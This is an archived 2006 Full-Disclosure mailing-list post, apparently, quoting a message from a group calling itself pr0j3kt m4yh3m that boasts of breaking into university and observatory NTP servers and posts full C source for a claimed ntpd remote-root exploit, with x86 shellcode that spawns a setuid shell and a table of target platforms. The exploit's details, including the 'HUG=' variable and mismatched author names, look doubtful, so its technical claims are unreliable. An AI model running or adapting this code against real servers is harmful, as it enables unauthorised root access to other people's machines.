| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Wed Jan 11 08:56:36 2006
From: skodliv at gmail.com (poo)
Subject: ntpd stack evasion 0day exploit
good to see the pr0j3kt is still rolling!!
On 1/10/06, !bSt bitwarz Security Team <bitwarz@...il.com> wrote:
>
>
> We are a cell of pr0j3kt m4yh3m in Latin America and western Europe.
> We have owned many research centers in Latin America, for example the
> ntp server at Observatorio Nacional, USP and UFRJ, in Brazil, home of our
> member
> ronaldinh0 and in many european universities,specially those ones knownby
> their
> high-profile computer science departments That's all. Keep the fucking
> pr0j3kt m4yh3m
> alive. Don't be confused by the evil words of
> the CISSPs and white hats.
>
> <-->ntpd_stack_evasion.c<-->
> /* ntpd remote root no-exec stack evasion spl0it
> * by m0sk0v
> *
> * Ntpd is time protocol most used in *nix distros.
> *
> * Due to a buffer overflow in dump_srv.c is possible to execute
> * arbitrary code in remote host by setting "HUG=" variable
> * upon time protocol.
> *
> * This works even on stack protection using heap to
> * alock data
> *
> * 0day!!!!!
> * 0day!!!!!
> * 0day!!!!!
> * 0day!!!!!
> * PRIVATE! DONT LEAK THIS EXPLOIT!
> * PRIVATE! DONT LEAK THIS EXPLOIT!
> * PRIVATE! DONT LEAK THIS EXPLOIT!
> * PRIVATE! DONT LEAK THIS EXPLOIT!
> * PRIVATE! DONT LEAK THIS EXPLOIT!
> * PRIVATE! DONT LEAK THIS EXPLOIT!
> * PRIVATE! DONT LEAK THIS EXPLOIT!
> *
> *
> * Gr33tZ to :
> * Marcos Flavio Assuncao (defhack.com), Denny Roger/www.batori.com.br
> (thx for
> * the shellcode, buddy!), ACME Security (www.acmesecurity.org), ksh
> *
> * [m0sk0v@...sko m0sk0v]$ ./ntpd_stack_evasion.c -t2 localhost
> * ntpd_stack_evasion.c by m0sk0v
> *
> * Selected platform: RedHat Linux 9.0 with ntpd 4.0.99k-RPM (/tmp/sh)
> *
> * RET: 0xbffff777 / Align: 240 / Sh-align: 160 / sending query
> * [1] <- evil query (pkt = 512 | shell = 45)
> * [2] <- null query (pkt = 12)
> * /tmp/sh was hacked.
> * [m0sk0v@...sko m0sk0v]$ ls -al /tmp/suid-shell
> * -rwsr-xr-x 1 root bin 512540 Aug 22 2005 /tmp/suid-shell
> *
> */
>
> #include <stdio.h>
> #include <stdlib.h >
> #include <stdarg.h>
> #include <string.h>
> #include <sys/types.h>
> #include <sys/socket.h>
> #include <netinet/in.h>
> #include <netdb.h>
> #include <unistd.h>
> #include <arpa/inet.h>
>
> #define NOP 0x90
> #define ADDRS 8
> #define PKTSIZ 512
>
> static char usage[] = "Use: ntpd_stack_evasion.c [-o offset] <-t type>
> <hostname>";
>
> /* generic execve() shellcodes */
>
> char lin_execve[] =
> "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
> "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
>
> "\x80\xe8\xdc\xff\xff\xff/tmp/sh";
>
> char bsd_execve[] =
> /* specially made by denny@...ori.com.br for ntpd_stack_evasion.c by
> m0sk0v */
> /* thanks for that, buddy! */
> "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f"
> "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52"
> "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/tmp/suid-shell\x01\x01"
>
> "\x01\x01\x02\x02\x02\x02\x03\x00\x03\x03\x03\x9a\x04\x04\x04\x07\x04";
>
> struct platforms
> {
> char *os;
> char *version;
> char *code;
> long ret;
> int align;
> int shalign;
> int port;
> };
>
>
> struct platforms targ[] =
> {
> { "FreeBSD 5.4-STABLE", "4.0.99k (/tmp/suid-shell)", bsd_execve,
> 0xbfbff8bc, 200, 220, 0 },
>
> { "FreeBSD 5.4-STABLE", "4.0.99k (/tmp/suid-shell)", bsd_execve,
> 0xbfbff540, 200, 220, 0 },
>
> { "RedHat Linux 9.0", "4.0.99k-RPM (/tmp/suid-shell)", lin_execve,
> 0xbffff777, 240, 160, 0 },
>
> { NULL, NULL, NULL, 0x0, 0, 0, 0 }
> };
>
> long getip(name)
> char *name;
> {
> struct hostent *hp;
> long ip;
> extern int h_errno;
>
> if ((ip = inet_addr(name)) < 0)
> {
> if (!(hp = gethostbyname(name)))
> {
> fprintf(stderr, "gethostbyname(): %s\n",
> strerror(h_errno));
> exit(1);
> }
> memcpy(&ip, (hp->h_addr), 4);
> }
>
> return ip;
> }
>
> int doquery(host, ret, shellcode, align, shalign)
> char *host, *shellcode;
> long ret;
> int align, shalign;
> {
> /* tcpdump-based reverse engineering :)) */
>
> char q2[] = { 0x16, 0x02, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00,
> 0x00, 0x00, 0x01, 0x36, 0x73, 0x74, 0x72, 0x61,
> 0x74, 0x75, 0x6d, 0x3d };
>
> char q3[] = { 0x16, 0x02, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00,
> 0x00, 0x00, 0x00, 0x00 };
>
> char buf[PKTSIZ], *p;
> long *ap;
> int i;
>
> int sockfd;
> struct sockaddr_in sa;
>
> bzero(&sa, sizeof(sa));
>
> sa.sin_family = AF_INET;
> sa.sin_port = htons(123);
> sa.sin_addr.s_addr = getip(host);
>
> if((sockfd = socket(AF_INET, SOCK_DGRAM, 0)) < 0)
> {
> perror("socket");
> return -1;
> }
>
> if((connect(sockfd, (struct sockaddr *)&sa, sizeof(sa))) < 0)
> {
> perror("connect");
> close(sockfd);
> return -1;
> }
>
> memset(buf, NOP, PKTSIZ);
> memcpy(buf, q2, sizeof(q2));
>
> p = buf + align;
> ap = (unsigned long *)p;
>
> for(i=0;i<ADDRS/4;i++)
> *ap++ = ret;
>
> p = (char *)ap;
>
> memcpy(buf+shalign, shellcode, strlen(shellcode));
>
> if((write(sockfd, buf, PKTSIZ)) < 0)
> {
> perror("write");
> close(sockfd);
> return -1;
> }
>
> fprintf(stderr, "[1] <- evil query (pkt = %d | shell = %d)\n", PKTSIZ,
> strlen(shellcode));
> fflush(stderr);
>
> if ((write(sockfd, q3, sizeof(q3))) < 0)
> {
> perror("write");
> close(sockfd);
> return -1;
> }
>
> fprintf(stderr, "[2] <- null query (pkt = %d)\n", sizeof(q3));
> fflush(stderr);
>
> close(sockfd);
>
> return 0;
> }
>
> int main(argc, argv)
> int argc;
> char **argv;
> {
> extern int optind, opterr;
> extern char *optarg;
> int ch, type, ofs, i;
> long ret;
>
> opterr = ofs = 0;
> type = -1;
>
> while ((ch = getopt(argc, argv, "t:o:")) != -1)
> switch((char)ch)
> {
> case 't':
> type = atoi(optarg);
> break;
>
> case 'o':
> ofs = atoi(optarg);
> break;
>
> case '?':
> default:
> puts(usage);
> exit(0);
>
> }
>
> argc -= optind;
> argv += optind;
>
> fprintf(stderr, "ntpd_stack_evasion.c by m0sk1t0\n\n");
>
> if (type < 0)
> {
> fprintf(stderr, "Please select platform:\n");
> for (i=0;targ[i].os;i++)
> {
> fprintf(stderr, "\t-t %d : %s %s (%p)\n", i,
> targ[i].os, targ[i].version, (void *)targ[i].ret);
> }
>
> exit(0);
> }
>
> fprintf(stderr, "Selected platform: %s with ntpd %s\n\n",
> targ[type].os, targ[type].version);
>
> ret = targ[type].ret;
> ret += ofs;
>
> if (argc != 1)
> {
> puts(usage);
> exit(0);
> }
>
> fprintf(stderr, "RET: %p / Align: %d / Sh-align: %d / sending
> query\n",
> (void *)ret, targ[type].align, targ[type].shalign);
>
> if (doquery(*argv, ret, targ[type].code, targ[type].align,
> targ[type].shalign) < 0)
> {
> fprintf(stderr, "Failed.\n");
> exit(1);
> }
>
> fprintf(stderr, "Done.\n");
>
> if (!targ[type].port)
> {
> fprintf(stderr, "/tmp/suid-shell was hacked.\n");
> exit(0);
> }
>
> exit(0);
> }
> <-->ntpd_stack_evasion.c<-->
>
> Thanks to Denny Roger @ Batori Software for his support
>
> --
> bitwarz Security Team !bST
> http://bitwarz.narod.ru
>
> # Save a bug, kill a white hat!
>
>
> --
> bitwarz Security Team !bST
> http://bitwarz.narod.ru
>
> # Save a bug, kill a white hat!
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
>
--
smile tomorrow will be worse
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20060111/ea8b38b0/attachment.html
Powered by blists - more mailing lists